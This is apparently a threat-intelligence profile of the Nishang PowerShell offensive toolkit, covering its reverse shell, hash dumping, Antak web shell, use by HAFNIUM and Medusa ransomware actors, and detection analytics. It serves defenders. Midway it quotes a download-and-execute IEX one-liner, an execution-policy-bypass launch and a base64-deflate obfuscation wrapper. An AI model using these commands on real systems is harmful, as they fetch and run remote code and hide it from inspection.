Nishang is a PowerShell-based offensive security toolkit comprising scripts and payloads for penetration testing and post-exploitation on Windows systems. Its capabilities include reconnaissance, persistence, lateral movement, credential harvesting, and remote command execution. It is a collection of tools rather than a single malware payload, and threat actors abuse its components alongside other intrusion utilities.
Nishang includes a TCP reverse-shell utility that initiates an outbound connection to an attacker-controlled command-and-control server, enabling remote interaction with a compromised system. Its Get-PassHashes script extracts password hashes and requires existing administrator privileges. The toolkit also includes Antak, an ASPX web shell.
HAFNIUM, also tracked as Ant, deployed Nishang as a post-compromise tool during exploitation of on-premises Microsoft Exchange servers in 2021. Nishang has also been observed in Medusa ransomware intrusions, where attackers used Get-PassHashes for credential dumping. These deployments establish its use in both state-sponsored intrusion activity and financially motivated ransomware operations.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Microsoft also reported that Ant deployed post-compromise tools such as Covenant, PowerCat, and Nishang.
the dumping of LSASS, the use of Nishang Powershell one-liners and much more that are incredibly helpful for monitoring for activity that other actors might use as well.
the dumping of LSASS, the use of Nishang Powershell one-liners and much more that are incredibly helpful for monitoring for activity that other actors might use as well.
the dumping of LSASS, the use of Nishang Powershell one-liners and much more that are incredibly helpful for monitoring for activity that other actors might use as well.
66 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Microsoft also reported that Ant deployed post-compromise tools such as Covenant, PowerCat, and Nishang.
Microsoft also reported that Ant deployed post-compromise tools such as Covenant, PowerCat, and Nishang.
The following analytic detects the use of the Nishang Invoke-PowerShellTCPOneLine utility, which initiates a callback to a remote Command and Control (C2) server.
The following analytic detects the use of the Nishang Invoke-PowerShellTCPOneLine utility, which initiates a callback to a remote Command and Control (C2) server.
The following analytic detects the use of the Nishang Invoke-PowerShellTCPOneLine utility, which initiates a callback to a remote Command and Control (C2) server.
The following analytic detects the use of the Nishang Invoke-PowerShellTCPOneLine utility, which initiates a callback to a remote Command and Control (C2) server.
14 distinct techniques documented for this family, organized by ATT&CK tactic.
Tools discovered may be pentest-utilities, for tunneling (SOCKS or other), reconnaissance scanners, exploitation code, reverse shells, malware loaders or trojans. The tools Procdump, Nishang and Powercat have been reported to be used by the HAFNIUM threat actor group according to Microsoft.
psi.FileName = "powershell.exe"; psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg; | Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
Paste the script in command textbox and click 'Encode and Execute'.
string code = Convert.ToBase64String(ms.ToArray()); string command = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('" + code + "')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();";
The exploitation has predominantly been in the form of semi-automatic installation of webshells that seems to leave backdoors for future access, or more manual by using tools to first gather credentials and system information followed by lateral movement and further compromise.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Nishang is a PowerShell offensive framework; the Invoke-PowerShellTCPOneLine utility provides a reverse shell/callback to a remote C2 server, enabling remote control and potential data exfiltration.
A PowerShell-based offensive framework whose Get-PassHashes payload was used to dump password hashes during the intrusion.
PowerShell offensive framework referenced here as post-exploitation tooling, specifically via PowerShell one-liners that may be used after Exchange compromise.
A PowerShell-based offensive toolkit used post-compromise on Exchange victims.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.